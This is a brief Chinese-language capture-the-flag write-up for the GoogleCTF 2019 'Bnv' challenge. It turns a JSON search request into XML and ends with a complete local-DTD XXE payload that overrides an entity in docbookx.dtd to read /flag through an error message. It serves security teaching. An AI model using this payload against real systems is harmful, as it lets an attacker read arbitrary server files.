[GoogleCTF2019 Quals]Bnv(本地dtdxxe)

抓包得到

POST /api/search HTTP/1.1
Host: e792cbca-d1bd-4263-a218-3ccd612c1195.node3.buuoj.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json
Referer: http://e792cbca-d1bd-4263-a218-3ccd612c1195.node3.buuoj.cn/
Content-Length: 38
Connection: close

{"message":"135601360123502401401250"}

貌似只有一个json数据。尝试对参数sql注入。。无果。
https://www.cnblogs.com/blacksunny/p/7891495.html
发现json还能进行XXE。
将json修改为xml格式。然后type改为xml。

报错Validation failed: no DTD found !, line 2, column 9
这里就涉及到本地DTD读取文件
https://www.dazhuanlan.com/2019/12/18/5df9cf41df595/
原理就是。我们本地有个可控的DTD文件。然后在xml中。重写dtd。

<?xml version="1.0"?>
<!DOCTYPE message[
    <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
    <!ENTITY % ISOamso '
<!ENTITY &#x25; file SYSTEM "file:///flag">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
'>
%local_dtd;
]>

下一篇： WUST-CTF2020(Web/Misc/Crypto)→